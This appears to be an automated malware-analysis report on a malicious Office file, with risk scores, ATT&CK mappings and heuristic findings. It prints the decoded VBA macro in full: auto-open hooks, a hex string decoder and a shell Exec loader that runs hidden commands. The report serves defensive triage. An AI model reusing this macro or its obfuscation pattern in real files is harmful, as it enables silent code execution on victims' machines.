MALICIOUS
Risk Score: 248
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sink functions. The presence of 'macros.bas' and the critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicate the macro's primary purpose is to download and execute a secondary payload. The specific family is not identifiable from the provided evidence.
Heuristics (10)
- ClamAV: Xls.Malware.Valyria-6700358-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Public Sub GTW_K() Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A")) Dim A_LOX As String`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Public Sub GTW_K() Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A")) Dim A_LOX As String`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `End Sub Public Sub Document_Open() Application.Run QOY_O("8371767E8D827285")`
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `End Sub Sub Workbook_Open() Application.Run "ThisWorkbook." & QOY_O("8371767E8D827285")`
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `End Sub Public Sub Auto_Open() Application.Run QOY_O("8371767E8D827285")`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4029 bytes |

SHA-256: 008174ad1d938d8139d073975c919635d66e42447c0a88be45c9a25ed856f5ec
Detection: ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact contains 12 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub GTW_K()
Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A"))
Dim A_LOX As String
A_LOX = "5C6D6DAD336C51416D6D964D6D73646D324E6D6D306D33AC437973A96D3E72366D596D344E76496D7C8A6D5B65A96D4A4880906D6F7D6D6D2E6D3C9D6D72866D6D38486D6DAC6D6D8A6D6D6D756D82578F5E6D896D64896D348E6781713C459B80AA6D6D2F4A806D78"
Dim M_US As String
M_US = "726D583656A6A3A16D6D426DAD6D4B6D6D72786D7B6D996D6D6D9655726D6D3F6D705F6D6D6D6D6D6D5E316D6D616B6D536D6D6D6D6D6D6D6D6D6D398A6D636D9B9F73AB57476D6D986D4A6D6D6D6F6D58714C59583F6D6D6D8667685A6D916D6D6D93466D6D3A6D4D"
Dim P_S As String
P_S = "6D6D6D406D6D9A6D6D46A8386D89A86D6D6D6DA9816D6D6D6D6D79566D996D405C39AA91406D91756D6B6D79496D5E386D726D6D5A6D6D2E6D31835F6D7160A36D956D6D456D959B6D6D436D77976D6D6F6DA56D6D6D6DAA923C5B5F6D6D38AC6D6D6D596D6D9CA96D"
Dim M_NV As String
M_NV = "6D8C6D6D896D936D6D6D6D5C97916D6D686A6D4F38506D6D413844336D5451806D4B6DA26D696D7D6D6D606D4D6D6D53626D6D6D6D69546D756D7C6D6D6D5D826D733041966D6D7C6D6DF1896D7C5F6D6D6D566D6D6D6D6D4E8B6D6D31916D6D6D3F6D6D916D918E6D"
Dim YSN_V As String
YSN_V = "2E6D7A6D6DA7592F92A76D6D6D5C8B6D6DAD6D6D6D8F6D547D6D6D6D57535D6D806D3E4D436D656B4B846D6D6D40636D476D6D6D6D624D6D6D6D6D95416881816E876D7AAD6D6D6D9B6D383366946D6D8A3E6D7C6D826DAD85ADAB6D6D586D31686D6D5E6D726D6D6D"
Dim D_L As String
D_L = "626D6D436D95606D6D576D336D33573D6D6D603F6D716D35E26D6D45A46D91A36D60976D45782E6DA06D6562456D346D7D6D6D6D737B6D3C6D6D88816D606D4E706D6D7E6D6D3F6D6D3F6DA07D6D806D6D6D5EA4A5896D686D386D35326D6D743D6D6D6D6D6D7DA96D"
Dim BY_QM As String
BY_QM = "6C7E98386D6D6D84456D6DAD796D6D6D926D6D386D32A936A8906D58356D6D6D6D4A996D6D6D9C6D5F6DA936A86D6D99326D9091AB6DA07A6D2F7C673F6D7D823B6D5C556D3D6DAB326D4C6DA06D6D8A53568EACAA5E6D4C6D6D626D8C556D6D6DA471566D6D6DA66D"
Dim RTU_WL As String
RTU_WL = "826DAAA191AA6D6D546D826D6D366D596D764A806D8FA56D3B75466D876D6D32988488939F5F6D612F656199818B6D685B6D6D8AA16D91326D83636D6D6DA16D7E435B6D6D6D6D6D6D7F6D5B396D6D826D6D6D6D6D6D6D6D8E6D6D6DA7986DA23176716D6D653AA14F"
Dim DT_KNM As String
DT_KNM = "3A646D6D6D6D456D6D6D4B9A6D636D6D3C806D4B9A6D6D956D7E676D836D626D6D956D626D6D6D816DA58858866D8F41846D4F786D6D8F996D7E9CAB796D3DA2756D6D6D6D99A9426D4E626B66A96D6D6D416D6D6D34AB6D7F95733577956D6D6D556D6D6D6453646E"
Dim SW_M As String
SW_M = "6530466D6D4D8F6D6D6D6D9C6D48416D6D776D7C896D6D726D838B9B836D6D6D746D67A26DA26D766D536D6D6D6DA66D95916D6D849030696D6D95826B30566D6D5E7B6D9E6D636DA66D8F6D6D6D696D6C8C7A6D4C6AA0AA6D6D6D866D6D5E6D6D64448B444B9F6D6D"
Dim H_K As String
H_K = "6D586D6D46A746976D6DA555AD6D6D416D67A56D476D745E7B6D53A4556E6D526D80756D6DA5726D67336D9DA1716977596D6D30AD676D5F6D6D6D6D316D6D6DA0706D61816DADA46DA1A16D5B6D896D503347906D46746D7A74976B4B9AA76D6D6D6D50826D6D9361"
Dim RYM_J As String
RYM_J = "6D6D7D36B85B6D6D6D5DA857A86D346D6F6F879E6D6D6F83406747A1946D6D6D946D60716D6D3D8F6D6D48A68A6D6D426D337B526D6E6DAB6D9E6D6D9B6D6D606D6D6DAD6D47A65F6D6DA26D6D6D816D326D8E696D6D536DAA3E69496D4C6D4A736D6D6D6D6D6D6D6D6D897C6D6DA467906D6D5B6D876D586D73376A44656DAA6D6D80846D9D6DA2946D356DA56DAD6D306D51A96D88"
D_ND.Exec (QOY_O(ActiveDocument.Variables("KQSI73").Value))
End Sub
Public Sub Auto_Open()
Application.Run QOY_O("8371767E8D827285")
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook." & QOY_O("8371767E8D827285")
End Sub
Public Function QOY_O(ByVal D_ND As String)
Dim WRZ_BD As String
Dim YU_JYJ As Long
For YU_JYJ = 1 To Len(D_ND) Step 2
WRZ_BD = WRZ_BD & Chr(Asc(Chr("&H" & Mid(D_ND, YU_JYJ, 2))) - 46)
Next
QOY_O = WRZ_BD
End Function
Sub UCHP_TDW()
GTW_K
End Sub
Public Sub Document_Open()
Application.Run QOY_O("8371767E8D827285")
End Sub